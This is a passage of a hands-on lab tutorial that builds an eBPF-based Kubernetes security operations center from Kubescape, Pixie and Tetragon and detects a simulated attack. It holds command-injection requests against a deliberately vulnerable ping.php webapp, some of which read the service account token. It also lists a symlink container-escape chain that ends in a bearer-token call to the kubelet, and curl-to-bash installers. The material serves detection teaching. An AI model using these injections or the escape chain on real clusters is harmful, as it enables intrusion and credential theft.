Adaptive Kubernetes Sovereign Security Operations Center

A Kubernetes sovereign SOC composed of the Musketeers, three CNCF eBPF projects

The Vision



Through eBPF, the Linux kernel offers a way to unify the disparate fields of security and observability via shared data structures. We show how a K8s Security Operations Center, organically composed of established eBPF projects (CNCF Kubescape, Pixie and Tetragon), can see signals that the individual tools cannot.

We explain how we achieve a comprehensive baseline and use independent signals to dial coverage up or down as suspicious indicators surface. The mutual independence of signals from across processes, file system, and network activity achieves a high signal-to-noise ratio, enabling manageable data volumes and facilitating selective forensic storage.

An adaptive Kubernetes Sovereign Security Operations Center based on eBPF

This lab is not officially maintained; it is a stand-in for PowerPoint slides. In the free tier, you may run out of RAM, but you can run the code on any other Kubernetes cluster, since the code is open source.

The initiative to build this SOC is actively ongoing, but some contributors are currently completely unfunded.

As with any young project, we do not promise anything; we simply show feasibility.

Meet the Musketeers

How do we achieve a comprehensive baseline and use independent signals to dial coverage up or down as suspicious indicators surface?

Below, we introduce the tooling that provides mutually independent information from across processes, file system, and network:

- achieving a high signal-to-noise

- enabling manageable data volumes

- facilitating selective forensic storage

- all while remaining digitally sovereign.

After a decade of innovation, the eBPF ecosystem has matured into interoperable building blocks.

For those orthogonal data sources, which we lovingly ♥️ refer to as musketeers, we chose:

Pixie, Kubescape, Tetragon

In order of appearance, they are



Kubescape as The Scout: scans everything

- knows the Kubernetes threat model

- can learn baselines of applications

- alerts on anomalies

Pixie as The Tracer: understands (almost) all protocols

- real-time debugger

- introspects protocols (SQL, DNS, HTTP, Kafka, Redis...) in real time

- 100% sovereign: collects data into the analysis cockpit without data ever being stored outside your DC

- manages real-time distributed deployment of on-demand eBPF traces

Tetragon as The Sniper: ultra-specific targeting of identified targets (in the kernel)

- abstracts eBPF into YAML

- useful if you know what you are looking for

- provides guarantees against rate-limiting

eBPF allows our musketeers to change the Linux Kernel on-demand

eBPF can attach to and change the behaviour of the network, files, processes, mounts, and libraries without changing applications.

Today, we'll gloss over what eBPF really is, but next week there is a public hands-on workshop at the IKT:

Learn about SSL introspection (and lots of other eBPF magic 🪄) at the IKT, 26.06.2025

https://labs.iximiuz.com/trainings/ebpfintrodeutsch-d3dd1c6c

Let's deploy a custom version of Pixie (our first musketeer)

Welcome to this setup section

git clone https://github.com/k8sstormcenter/honeycluster.git

cd honeycluster

git checkout 173-honeycluster-with-db-and-pixieconnectors-can-be-deployed-publicly

Then, we install a standard Pixie and connect it to the UI.

You can accept the defaults; you need an email address for the UI signup.

sudo bash -c "$(curl -fsSL https://getcosmic.ai/install.sh)"

export PX_CLOUD_ADDR=getcosmic.ai

px auth login

px deploy -p=1Gi

kubectl apply -f honeystack/pixie/pixie_vizier/entlein_pixieJune19.yaml

In the last step, we glob-deployed a custom version of pixie.

Make sure to wait until Pixie is healthy again. This takes about 10 minutes, so feel free to continue reading and come back here when it's finished.

Before installing an external data source, first define the connector points

Behind the scenes, we are initializing the schemas like so 💡

When you clicked "Start Playground", the init tasks did the following:

./labinit.sh

input_file="/honeycluster/analysis/file_sourcer/kubescape/kubescape_schema_init.json"

output_file="/tmp/kubescape.json"

mv $input_file $output_file

You don't need to do anything here, but if you're on your own system, these files need to exist.
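
On your own system, a quick pre-flight check can confirm that the file Pixie will watch actually exists before you register it as a source. The following is a minimal sketch, assuming the file is newline-delimited JSON (an assumption, the lab does not state the exact layout). `check_source_file` is a hypothetical helper name and not part of Pixie.

```python
import json
from pathlib import Path


def check_source_file(path: str) -> dict:
    """Report whether a file exists and how many non-empty lines parse as JSON."""
    p = Path(path)
    if not p.is_file():
        return {"exists": False, "lines": 0, "valid_json": 0}
    lines = [ln for ln in p.read_text().splitlines() if ln.strip()]
    valid = 0
    for ln in lines:
        try:
            json.loads(ln)
            valid += 1
        except json.JSONDecodeError:
            pass  # count only the lines that parse
    return {"exists": True, "lines": len(lines), "valid_json": valid}


# Path taken from the init script above.
print(check_source_file("/tmp/kubescape.json"))
```

If `exists` is false on a node, the file source defined in the next step would have nothing to read there.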



In the Pixie UI (https://work.getcosmic.ai/live/clusters/), navigate to the first dropdown, called ScratchPad.

Make sure that the cluster shows a green icon.

ScratchPad

The following spec configures Pixie to watch for local files with a certain schema and ingest them:

In the text field on the right, enter the following and then click Run:

import px

import pxlog

import pxtrace

glob = "/tmp/kubescape.json"

table = "kubescape.json"

pxlog.FileSource(glob, table, "4h")

df = px.DataFrame(table)

px.display(df)

Confirm the table exists: https://work.getcosmic.ai/live/clusters/default_189907a4?script=px%2Fschemas

Congrats, you just added an external data source to Pixie 🖤. This will allow us to ingest anomalies from Kubescape, extract their metadata and use it for adaptive enrichment.

Install Kubescape (our second musketeer)

make kubescape vector

This now produces the file /tmp/kubescape.json on the respective nodes, which contains all anomalies.

Feeding kubescape into pixie

Tetragon (our third musketeer)

Alright, same game with Tetragon: in the UI, feed its output into Pixie

import px

import pxlog

import pxtrace

glob = "/tmp/tetragon.json"

table = "tetragon.json"

pxlog.FileSource(glob, table, "4h")

df = px.DataFrame(table)

px.display(df)

make tetragon traces

So far, we have all the musketeers:

- Kubescape feeds into Pixie via Vector to filter only on anomalies

- Tetragon feeds into Pixie via Vector and monitors certain specific traces in the kernel

But we don't have any applications deployed yet, and that's a bit boring.

cd /home/laborant/

git clone https://github.com/k8sstormcenter/bobctl.git

cd bobctl

git checkout 1-bobctl-to-install-and-uninstall-a-helm-chart

make helm-install

make helm-test



What is exposure?

Exposure vs. Risk: Understanding the Difference

| Concept | Description | Analogy | Focus |
|---|---|---|---|
| Exposure | The state of being subjected to a harmful effect or event. It signifies that a system, asset, or data is in a situation where a threat could act upon it, often due to an existing vulnerability or weakness. | Your skin being directly under the sun. | Susceptibility to harm |
| Risk | The likelihood of a threat acting upon an exposure and the potential impact (or severity of harm) resulting from that event. It combines the probability of the harmful event occurring with the magnitude of its consequences. | The chance of getting a sunburn (threat materializing on exposed skin) and how severe that sunburn might be. | Probability & Impact of harm |

Key Differences Summarized:

- Exposure is a state; Risk is a calculation.

- You can have an exposure (e.g., an unpatched server, skin without SPF exposed outside) without an immediate high risk if there are no active threats targeting that specific vulnerability or if the impact of exploitation is low (or the sky is very overcast).

- Risk quantifies the danger posed by an exposure.

- Exposure is about the "open door"; Risk is about the "burglar and what they take."

- An open port is an exposure.

- The risk is that an attacker scans for that open port, exploits the service running on it, and exfiltrates sensitive data or causes a denial of service.

- You can have many exposures, but the level of risk associated with each can vary greatly.

- A publicly accessible database with default credentials is a high exposure and likely a high risk.

- An internal, non-critical system with a minor, difficult-to-exploit vulnerability might be an exposure but represent a low risk.
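
To make "Exposure is a state; Risk is a calculation" concrete, here is a minimal sketch that scores a few exposures. It assumes the simplest possible model, risk = likelihood x impact, and the numbers are made up for illustration; neither the model nor the values come from the lab.

```python
from dataclasses import dataclass


@dataclass
class Exposure:
    name: str
    likelihood: float  # assumed probability (0..1) that a threat acts on it
    impact: float      # assumed severity of harm on a 0..10 scale

    def risk(self) -> float:
        # Simplified model: risk = likelihood x impact
        return self.likelihood * self.impact


def rank_by_risk(exposures):
    """Return exposures sorted from highest to lowest risk."""
    return sorted(exposures, key=lambda e: e.risk(), reverse=True)


# Illustrative values only.
exposures = [
    Exposure("internal non-critical system, hard-to-exploit bug", 0.05, 2.0),
    Exposure("public database with default credentials", 0.9, 9.0),
    Exposure("open port with a patched service", 0.2, 4.0),
]
for e in rank_by_risk(exposures):
    print(f"{e.risk():5.2f}  {e.name}")
```

All three entries are exposures, but only the ranking tells you where to spend effort first.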

Risk vs. Exposure. Source: "On the link between risk and exposure", Terje Aven, 2012



Backstory: the 4 types of Kubernetes exposure

There are 4 basic ways to attack Kubernetes.

If we are measuring exposure, we need to monitor these 4 areas:

Control Plane: Controls the configuration of Kubernetes AND of everything that is running on it

Supply Chain: The origin of all artefacts running (or sleeping) on the system

Data Plane: Applications and payloads running that are delivering the "business logic"

Cloud Provider: Controls the metal, the hypervisor and potentially a lot more

Typically, we have very different Threat Models for each of those sections.

If you are doing this the first time, you might get overwhelmed by how many moving parts are everywhere.



Step 1: Static scan of configuration (Kubescape)

This is why there are templates to start from: you scan the entire cluster and compare it against them.

curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

export PATH=$PATH:/home/laborant/.kubescape/bin

Output of scan

Compliance Score

────────────────

The compliance score is calculated by multiplying control failures by the number of failures against supported compliance frameworks. Remediate controls, or configure your cluster baseline with exceptions, to improve this score.



* MITRE: 66.22%

* NSA: 58.40%

View a full compliance report by running '$ kubescape scan framework nsa' or '$ kubescape scan framework mitre'

Output of Mitre compliance scan in detail

So please don't pay for pentesters before you have run a few of these scanners and remediated the findings to the point where you can't harden any further.

So far, nothing has been actively probed. We only ran scans and compared the deployed configuration against reference best-practice configurations.





Step 2: Static scan of running applications/containers (Kubescape)

During the talk, we'll skip this step, as it takes a very long time. Please feel free to do this on your own time.

kubescape scan --scan-images

Kubescape can scan lots of things incl images



https://github.com/kubescape/kubescape/blob/master/docs/img/architecture-diagram.png

Important: Image scanning can (and should) be done in CI, in the artefact registry and at runtime.

The results always look the same, i.e. a list of CVEs grouped by criticality.

However, it makes a huge difference whether you find a CVE during development (CI), in a registry, or at runtime.


Kubescape output of image scan

While the scan itself typically is the same, the resulting process/actions differ.

This lab is all about runtime.

So far, we have a list of misconfigurations (found by comparing deployed manifests against best practice) and a list of CVEs in all images running on our cluster.

Part 1: Runtime exposure - The Theory

There comes a point in hardening where a cluster, including its payload, is moved to production. Usually, it will still have a set of misconfigurations and CVEs, for whatever reason. And possibly zero-days, of course.

Question: What to do at runtime if I can't fix it all perfectly?

Answer: A mix of detection and response (always assuming we have a decent threat model)

General remarks: Our detection strategy

You could be watching for Indicators of Compromise and have super long lists of rules (see e.g. Project Falco).

We take a different path: Anomaly + Critical Attack Path Modelling

Anomaly

We define known benign behaviour by recording an application under usual traffic.

Critical Attack Path Modelling



We classify all possible kubernetes post-exploitation attacks into

- their previous state

- their next state

- and model a set of IoCs required for proof that an attack has transitioned into the next state

Below, we'll see an example:

State 0: a vulnerable (at-risk) application is deployed with internet access

State 1: the application has been exploited, i.e. used in an unknown way

from here on, we treat it as compromised

State 2: we watch for the tell-tale signals of which type of attack is going on, out of CESC, ESC-Socket, ESC-Volume, IDENTITY, POD, ROLE, TOKEN

A rough sketch of the decision tree:

Select ONE OUT OF controlplane, dataplane, supplychain, infrastructure (CSP)

e.g. dataplane

Select ONE OUT OF CESC, ESC-Socket, ESC-Volume, IDENTITY, POD, ROLE, TOKEN

e.g. POD

etc etc

Kubehound attack graph https://kubehound.io/reference/graph

If an attacker needs to create a new pod, there is a minimal and deterministic set of things that must occur; we call this the critical attack path. If we can prove that a single step along this path, i.e. a state change, has occurred, meaning that a very specific set of IoCs (which we call an edge of the critical attack path) was present, we can quantify the risk of your entire cluster being compromised.
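
The idea of states connected by edges, where each edge is proven by a specific set of IoCs, can be sketched as a small state machine. This is only an illustration under stated assumptions: the class names and the IoC labels (`read_mounts`, `read_sa_token`, `api_server_call`) are hypothetical and are not taken from the SOC's actual threat model.

```python
from dataclasses import dataclass, field


@dataclass
class Edge:
    """One step of a critical attack path: all IoCs must be seen to transition."""
    name: str
    required_iocs: frozenset


@dataclass
class AttackPath:
    name: str
    edges: list
    state: int = 0                      # index of the next edge to prove
    seen: set = field(default_factory=set)

    def observe(self, ioc: str) -> bool:
        """Record an IoC; return True if it completed a state transition."""
        if self.state >= len(self.edges):
            return False                # path already fully traversed
        self.seen.add(ioc)
        if self.edges[self.state].required_iocs <= self.seen:
            self.state += 1
            self.seen.clear()           # the next edge needs fresh evidence
            return True
        return False

    def progress(self) -> float:
        """Fraction of the path that has been proven so far."""
        return self.state / len(self.edges)


# Hypothetical IoC labels, for illustration only.
path = AttackPath("POD", [
    Edge("recon", frozenset({"read_mounts"})),
    Edge("credential", frozenset({"read_sa_token", "api_server_call"})),
])
path.observe("read_mounts")        # completes the first edge
path.observe("read_sa_token")      # second edge still needs api_server_call
print(path.state, path.progress())
```

Clearing `seen` after each transition is a deliberate simplification: it forces evidence to arrive in path order, which a real model may not want.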

Important takeaway: We do not monitor the entire cluster.

(1) Determine baseline of all applications

(2) Detect anomaly

(3) Extract data from anomaly to create filters

(4) Prepare GENERIC and SPECIFIC consequences to an anomaly.

(5) Use the dynamically generated new data to narrow down on IoC (using the threat model)

(6) Switch on forensic saving

(7) Allow analysts to add/remove custom eBPF traces (and even blockers)

We have :

- ALWAYS ON traces

- ALWAYS ON anomaly detection

Important to avoid self-DoS

Once an anomaly has been classified and confirmed, we must release the unnecessary traces after ensuring that the necessary SPECIFIC ones are collecting data.

Inconclusive data may be kept for forensic purposes
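
The trace lifecycle described above (switch on traces on demand, cap how many run at once, release the generic ones once the specific ones collect data) could be tracked with a small registry. This is a minimal sketch, not the project's implementation: `TraceRegistry`, its methods and the trace names are hypothetical.

```python
import time


class TraceRegistry:
    """Tracks on-demand traces and drops them once they expire or are released."""

    def __init__(self, max_active: int = 10):
        self.max_active = max_active     # hard cap to avoid self-DoS
        self._active = {}                # trace name -> expiry (epoch seconds)

    def activate(self, name: str, ttl_s: float, now: float = None) -> bool:
        now = time.time() if now is None else now
        self.expire(now)
        if name not in self._active and len(self._active) >= self.max_active:
            return False                 # refuse rather than overload the node
        self._active[name] = now + ttl_s
        return True

    def release(self, name: str) -> None:
        self._active.pop(name, None)

    def expire(self, now: float = None) -> None:
        now = time.time() if now is None else now
        self._active = {n: t for n, t in self._active.items() if t > now}

    def active(self, now: float = None) -> list:
        self.expire(now)
        return sorted(self._active)


reg = TraceRegistry(max_active=3)
reg.activate("generic-dns", ttl_s=300, now=0)
reg.activate("generic-http", ttl_s=300, now=0)
reg.activate("specific-sa-token", ttl_s=3600, now=60)  # specific trace is collecting
reg.release("generic-http")                            # then drop what is no longer needed
print(reg.active(now=400))
```

The explicit `now` parameter exists only to make the example deterministic; in practice the wall clock would be used.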

Part 2: Live example - a vulnerable application, with a behaviour profile, that gets exploited

First, we get ourselves an app that has a known benign behaviour profile (a BoB). In another terminal execute the following steps to deploy the webapp

cd /home/laborant/bobctl

make helm-test

make fwd

commands for detailed understanding 💡

At this point you should see executions (of the webapp starting) in Tetragon, but Kubescape should be silent.

Either execute this in the Pixie UI under ScratchPad to display a table:

import px

df = px.DataFrame(table="kubescape.json")

px.display(df)

or just run the PxL script in your shell:

px run -f /home/laborant/honeycluster/analysis/file_sourcer/kubescape/display_kubescape.pxl

The reason it is silent is that this webapp comes with a profile of acceptable behavior, and the helm test executes only such acceptable behavior (i.e. it pings things).

px run -f /home/laborant/honeycluster/analysis/file_sourcer/tetragon/display_tetragon.pxl

The Tetragon output is of no further consequence at this point; we only look at it if there is an anomaly. In the future, there will be a service that deduplicates Tetragon events similarly to Kubescape.





Adaptive Backreaction: This figure describes, at a high level, how the components interoperate. From a threat model (green), rules are implemented that inform the hive operator which states to achieve. The individual methods may range from very generic to highly bespoke. The plan is to ship the configuration with solid k8s post-exploitation default reactions, while allowing the rules to be extended in the hive sentinel.

Current state

We have the webapp, and it has a so-called profile that knows how the app should behave under benign conditions.

Step 1: Kubescape detects an anomaly

Kubescape Architecture

Execute something to cause an anomaly: `make attack` 💡

`make attack` runs the following commands:

export POD_NAME=$(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}")

kubectl --namespace webapp port-forward $POD_NAME 8080:80 &

curl 127.0.0.1:8080/ping.php?ip=1.1.1.1\;ls

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bping%20google.com"

curl 127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/proc/self/mounts

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20index.html"

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/run/secrets/kubernetes.io/serviceaccount/token"

curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcurl%20google.com"

curl 127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/proc/self/mounts

Handling connection for 8080

<pre>

<strong>Ping results for 1.1.1.1;cat /proc/self/mounts:</strong><br>

PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.<br>

<span style='color: #4caf50;'>64 bytes from 1.1.1.1: icmp_seq=1 ttl=57 time=0.926 ms</span><br>

<span style='color: #4caf50;'>64 bytes from 1.1.1.1: icmp_seq=2 ttl=57 time=1.35 ms</span><br>

<span style='color: #4caf50;'>64 bytes from 1.1.1.1: icmp_seq=3 ttl=57 time=1.07 ms</span><br>

<span style='color: #4caf50;'>64 bytes from 1.1.1.1: icmp_seq=4 ttl=57 time=1.83 ms</span><br>

<br>

--- 1.1.1.1 ping statistics ---<br>

4 packets transmitted, 4 received, 0% packet loss, time 3027ms<br>

rtt min/avg/max/mdev = 0.926/1.292/1.834/0.346 ms<br>

overlay / overlay rw,relatime,lowerdir=/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/203/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/202/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/200/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/199/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/198/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/197/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/196/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/195/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/194/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/193/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/192/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/191/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/190/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/189/fs:/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/188/fs,upperdir=/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/230/fs,workdir=/var/lib/rancher/k3s/agent/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/230/work 0 0<br>

proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0<br>

tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755 0 0<br>

devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0<br>

mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0<br>

sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0<br>

cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime 0 0<br>

/dev/root /etc/hosts ext4 rw,relatime,stripe=4 0 0<br>

/dev/root /dev/termination-log ext4 rw,relatime,stripe=4 0 0<br>

/dev/root /etc/hostname ext4 rw,relatime,stripe=4 0 0<br>

/dev/root /etc/resolv.conf ext4 rw,relatime,stripe=4 0 0<br>

/dev/root /host/var/log ext4 rw,relatime,stripe=4 0 0<br>

shm /dev/shm tmpfs rw,relatime,size=65536k 0 0<br>

tmpfs /run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime,size=4024080k 0 0<br>

proc /proc/bus proc ro,nosuid,nodev,noexec,relatime 0 0<br>

proc /proc/fs proc ro,nosuid,nodev,noexec,relatime 0 0<br>

proc /proc/irq proc ro,nosuid,nodev,noexec,relatime 0 0<br>

proc /proc/sys proc ro,nosuid,nodev,noexec,relatime 0 0<br>

proc /proc/sysrq-trigger proc ro,nosuid,nodev,noexec,relatime 0 0<br>

tmpfs /proc/acpi tmpfs ro,relatime 0 0<br>

tmpfs /proc/kcore tmpfs rw,nosuid,size=65536k,mode=755 0 0<br>

tmpfs /proc/keys tmpfs rw,nosuid,size=65536k,mode=755 0 0<br>

tmpfs /proc/timer_list tmpfs rw,nosuid,size=65536k,mode=755 0 0<br>

tmpfs /proc/scsi tmpfs ro,relatime 0 0<br>

tmpfs /sys/firmware tmpfs ro,relatime 0 0<br>

</pre>

<strong>Return status:</strong> 0
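
The requests above are plain command injections: a shell command is appended to the `ip` parameter after a `;` and then percent-encoded (`;` becomes `%3B`, a space becomes `%20`). The sketch below shows that encoding with Python's standard library; `build_injection_url` is a hypothetical helper, intended only for reproducing the lab requests against the deliberately vulnerable webapp.

```python
from urllib.parse import quote, unquote


def build_injection_url(base: str, ip: str, command: str) -> str:
    """Append a shell command to the `ip` parameter and percent-encode it."""
    payload = f"{ip};{command}"
    return f"{base}?ip={quote(payload)}"


url = build_injection_url("127.0.0.1:8080/ping.php", "1.1.1.1", "cat /proc/self/mounts")
print(url)
# Decoding the parameter recovers what the server-side shell will execute after `ping`.
print(unquote(url.split("ip=", 1)[1]))
```

The decoded value is exactly the string that shows up in the "Ping results for ..." line of the response.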



Now, rerun the PxL script

px run -f /home/laborant/honeycluster/analysis/file_sourcer/kubescape/display_kubescape.pxl

Let's have a look at the threat model of post-exploitation Kubernetes:

| Attack | Step 0 | Step 1 | Step 2 | Step 3 |
|---|---|---|---|---|
| CE_VAR_LOG_SYMLINK | cat /proc/self/mounts | ln -s / /host/var/log/root_link | cat /var/run/secrets/kubernetes.io/serviceaccount/token | curl -sk -H "Authorization: Bearer $KUBE_TOKEN" https://$NODEIP:10250/logs/ |

How the anomaly detection works 💡

What we call a Bill of Behaviour is encoded on the cluster by a so-called applicationProfile:

kubectl get applicationprofiles.spdx.softwarecomposition.kubescape.io -A

kubectl describe applicationprofiles.spdx.softwarecomposition.kubescape.io -n webapp replicaset-webapp-mywebapp-67965968bb

Based on our threat model, we identify two important pieces:

{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched","arguments":{"args":["/bin/cat","/proc/self/mounts"],"exec":"/bin/cat","retval":0},"infectedPID":383467,

This is a clear indicator of the CE_VAR_LOG_SYMLINK attack, a container escape via a symlink in the log files.

Thus, we collect the metadata, e.g. pod name, namespace, etc.

{"podName":"webapp-mywebapp-6d5bc6f895-6wb7b","podNamespace":"webapp","workloadKind":"Deployment","workloadName":"webapp-mywebapp","workloadNamespace":"webapp"}
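
Turning this metadata into a filter for follow-up tracing is mostly a matter of picking the right keys. A minimal sketch, using the exact fragment shown above as input; `to_filter` and the shape of the returned dictionary are assumptions made for illustration.

```python
import json

# Metadata fragment as shown above.
raw = ('{"podName":"webapp-mywebapp-6d5bc6f895-6wb7b","podNamespace":"webapp",'
       '"workloadKind":"Deployment","workloadName":"webapp-mywebapp",'
       '"workloadNamespace":"webapp"}')


def to_filter(k8s_details: dict) -> dict:
    """Keep only the fields needed to scope follow-up tracing to one pod."""
    return {
        "namespace": k8s_details["podNamespace"],
        "pod": k8s_details["podName"],
        "workload": f'{k8s_details["workloadKind"]}/{k8s_details["workloadName"]}',
    }


print(to_filter(json.loads(raw)))
```

Keeping the workload alongside the pod name is useful because the pod name changes when the pod is rescheduled, while the workload does not.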

We also have the process tree, where we can literally see by eye 👁️ that the primary compromise occurred through an injection attack

{"processTree":{"childrenMap":

{"cat␟135881":

{"cmdline":"/bin/cat /proc/self/mounts",

"comm":"cat","cwd":"/var/www/html",

"gid":33,

"hardlink":"/bin/cat",

"path":"/bin/cat",

"pcomm":"sh",

"pid":135881,

"ppid":135841,

"uid":33,

"upperLayer":false}

},

"cmdline":"/bin/sh -c ping -c 4 1.1.1.1;cat /proc/self/mounts","comm":"sh","cwd":"/var/www/html"...

}}
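
What the eye spots in this tree, a shell whose command line chains a second command after `;`, can also be checked mechanically. The following is a naive sketch under stated assumptions: the sample tree is trimmed to fields visible in the alert above, the nesting (a node with a `childrenMap`) is inferred from that excerpt, and `find_injected_children` is a hypothetical helper. A `;` in a command line is a heuristic, not proof of injection.

```python
def find_injected_children(node: dict, found=None) -> list:
    """Walk a process tree and collect children of a shell that chains commands with ';'."""
    found = [] if found is None else found
    chained = node.get("comm") == "sh" and ";" in node.get("cmdline", "")
    for child in node.get("childrenMap", {}).values():
        if chained:
            found.append((node["cmdline"], child.get("cmdline", "")))
        find_injected_children(child, found)
    return found


# Trimmed sample using only fields visible in the alert above.
tree = {
    "comm": "sh",
    "cmdline": "/bin/sh -c ping -c 4 1.1.1.1;cat /proc/self/mounts",
    "childrenMap": {
        "cat␟135881": {"comm": "cat", "cmdline": "/bin/cat /proc/self/mounts",
                       "pid": 135881, "ppid": 135841, "pcomm": "sh"},
    },
}
for parent, child in find_injected_children(tree):
    print(f"{child!r} spawned by {parent!r}")
```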





Consequences of the anomaly

We zoom in on the compromised pod and activate GENERIC MONITORING and TRACING:

- for Unexpected process launched -> HTTP (incl. k8s audit logs) and DNS for 5 min

- for Unexpected system call -> in this case, fadvise64 is pretty hard to interpret, so we'll just watch the node where this pod is running for new processes outside the container

Extract the metadata from the "possibly infected" process

We do not want to watch the entire cluster. Only the traffic from/to this pod and the processes on the node, where the pod is running.

In Pixie UI under Scratchpad, execute this to get the timestamp

import px

df = px.DataFrame(table="kubescape.json")

# Extract podNamespace and podName from the RuntimeK8sDetails field

df.alert = px.pluck(df.message, "message")

df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace")

df.podName = px.pluck(df.RuntimeK8sDetails, "podName")

df.timestamp = px.pluck(df.event, "timestamp")

# Select only the desired columns

df = df['message','podName','namespace', 'timestamp']

px.display(df, "kubescape_pods")

We use the identified labels to pluck this data into Pixie

Zooming into the compromised pod by selecting the labels from the anomaly

So, now we have the identifiers of the 4 currently tracked anomalies! This will depend on which injections you execute above.





Enrich on the fly

We need more data to be sure what's going on, so we instruct Pixie to enrich AND to start forensics.

The following defines a UI element in Pixie that watches DNS traffic for the pod name we just identified.

NOTE: You'll only get a result if you used a command that created some DNS traffic, such as curl 127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bping%20google.com

import px

# kube-dns.kube-system.svc.cluster.local -> kube-dns.kube-system

def format_nslookup_name(df):
    df.idx1 = px.find(df.to_entity, '.svc.cluster')
    leftovers = df[df.idx1 < 0]
    df = df[df.idx1 >= 0]
    df.to_entity = px.substring(df.to_entity, 0, df.idx1)
    return df.append(leftovers)

def dns_flow_graph(start_time: str, from_entity_filter: str, to_entity_filter: str):
    df = px.DataFrame('dns_events', start_time=start_time)

    # Client-side tracing only.
    df = df[df.trace_role == 1]
    df = df.drop(['trace_role'])

    # Add context.
    df.pod = df.ctx['pod']
    df.service = df.ctx['service']
    df.namespace = df.ctx['namespace']

    # Create table in drawer.
    px.debug(df, "dns_events")

    # IMPORTANT FILTER HERE: OUR SUSPICIOUS POD
    df = df[px.contains(df.pod, "webapp-mywebapp")]

    # IMPORTANT FILTER HERE: THE TIMESTAMP OF THE ANOMALY
    df = df[px.abs(px.time_to_int64(df.time_) - 1750069077050210800) < px.parse_duration("15s")]

    # Specify from and to entities.
    df.from_entity = df.pod
    localhost_ip_regexp = r'127\.0\.0\.[0-9]+'
    df.is_remote_addr_localhost = px.regex_match(localhost_ip_regexp, df.remote_addr)
    df.to_entity = px.select(df.is_remote_addr_localhost,
                             px.upid_to_pod_name(df.upid),
                             px.Service(px.nslookup(df.remote_addr)))

    df = format_nslookup_name(df)
    return df
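
The timestamp filter in the script above keeps only events within 15 seconds of the anomaly, comparing nanosecond epoch values. The same arithmetic in plain Python, as a minimal sketch: `to_epoch_ns` and `within_window` are hypothetical helper names, and the example event time is made up.

```python
from datetime import datetime, timezone

NS_PER_S = 1_000_000_000


def to_epoch_ns(ts: datetime) -> int:
    """Convert a timezone-aware datetime to nanoseconds since the Unix epoch."""
    return int(ts.timestamp()) * NS_PER_S + ts.microsecond * 1000


def within_window(event_ns: int, anomaly_ns: int, window_s: int = 15) -> bool:
    """True if the event lies within +/- window_s seconds of the anomaly."""
    return abs(event_ns - anomaly_ns) < window_s * NS_PER_S


anomaly_ns = 1750069077050210800          # value hard-coded in the script above
event = datetime(2025, 6, 16, 10, 18, 5, tzinfo=timezone.utc)  # made-up event time
print(within_window(to_epoch_ns(event), anomaly_ns))
```

In the adaptive setup, the hard-coded value would be replaced by the timestamp plucked from the Kubescape alert.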

Vis Spec for the DNS Flow Graph 💡

{

"variables": [

{

"name": "start_time",

"type": "PX_STRING",

"description": "The start time of the window in time units before now.",

"defaultValue": "-5m"

},

{

"name": "from_entity_filter",

"type": "PX_POD",

"description": "The partial string to match the 'from_entity' (source pod).",

"defaultValue": ""

},

{

"name": "to_entity_filter",

"type": "PX_STRING",

"description": "The partial string to match the 'to_entity' (destination service).",

"defaultValue": ""

}

],

"globalFuncs": [

{

"outputName": "dns_flow",

"func": {

"name": "dns_flow_graph",

"args": [

{

"name": "start_time",

"variable": "start_time"

},

{

"name": "from_entity_filter",

"variable": "from_entity_filter"

},

{

"name": "to_entity_filter",

"variable": "to_entity_filter"

}

]

}

}

],

"widgets": [

{

"name": "DNS Flow Graph",

"position": {

"x": 0,

"y": 0,

"w": 12,

"h": 4

},

"globalFuncOutputName": "dns_flow",

"displaySpec": {

"@type": "types.px.dev/px.vispb.Graph",

"adjacencyList": {

"fromColumn": "from_entity",

"toColumn": "to_entity"

},

"edgeWeightColumn": "latency_avg",

"edgeHoverInfo": [

"latency_avg",

"latency_max",

"count"

],

"edgeLength": 500

}

},

{

"name": "Table",

"position": {

"x": 0,

